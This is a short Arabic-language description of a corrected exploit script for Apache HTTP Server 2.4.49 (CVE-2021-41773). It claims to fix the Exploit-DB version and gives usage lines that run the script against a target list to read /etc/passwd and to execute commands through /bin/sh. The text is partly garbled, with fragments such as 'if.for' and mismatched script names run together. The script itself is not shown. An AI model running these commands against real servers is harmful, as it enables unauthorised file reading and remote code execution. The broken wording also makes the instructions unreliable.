
إصلاح ثغرة استغلال ثابتة لخادم Apache HTTP Server 2.4.49 CVE-2021-41773 الخاصة بتجاوز المسار وتنفيذ التعليمات البرمجية عن بُعد. تقرأ ملفات عشوائية وتنفذ الأوامر على الأهداف المعرضة للخطر.
هذا استغلال لثغرة Apache HTTP Server 2.4.49 المعروفة باسم CVE-2021-41773. كانت النسخة الأصلية من الاستغلال المنشورة في Exploit-DB تحتوي على أخطاء في الصيغة والتنفيذ، لذلك تم تصحيح هذه النسخة لضمان عملها بشكل صحيح في بيئات Linux.
if.for لضمان تنفيذها الصحيح.chmod +x PoC.sh
./50383.sh targets.txt /etc/passwd
targets.txt (قائمة الأهداف):http://192.168.1.100
http://vulnerable-site.com
/etc/passwd:./50383.sh targets.txt /etc/passwd
./50383.sh targets.txt /bin/sh whoami